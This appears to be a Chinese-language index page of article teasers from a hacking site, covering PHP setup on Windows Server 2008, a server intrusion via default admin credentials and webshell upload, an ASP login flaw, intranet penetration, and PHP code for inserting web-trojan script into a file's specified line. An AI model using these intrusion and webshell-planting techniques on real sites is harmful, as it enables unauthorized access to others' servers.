-
win2008下如何快速安装PHP
虽然现在跑PHP的最佳选择还是Linux,但是随着Windows Server 2008 的出现,前者和后者的差距已经大大缩小,对于不懂Linux操作的朋友,可以丢弃Windows 2003 Server了,选择更好的Windows Ser...
-
一次艰难服务器渗透提权
目标站是一家网站建设公司,拥有自己的服务器,用御剑初步扫描过,无SQL注入,通过扫描后台得到网站管理后台地址。用默认帐号密码:admin顺利进入后台 点击设置,在上传类型中添加asp,通过图片上传功能上传Webshell由于asp因为权限问...
-
毕节热线祝福程序v3.0 后台验证漏洞
该程序没有防注入代码,id=request("id")id=left(id,8)很多都这样取值,因为取值只取左边起8个字符,所以,注入没什么利用的。看看后台登录 /admin/login.asp<%if reque...
-
内网渗透如何打开突破口
内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破,一个大型的网站,一个大型的公司,一个大型的目标,在外肉,管理员总会千方百计的加强防范和修补漏洞,常规的方法进去几乎是不可能。 内网渗透的突破口是我们如何得到一个内网的个人机或...
-
php在文件指定行中写入代码
有的站主页是缓存页面,你加入的网马代码或是webshell代码经常被更新或是其它的因素干掉,所以弄了这个代码:<?php$file="aa.php" ;$code="<script src=http...
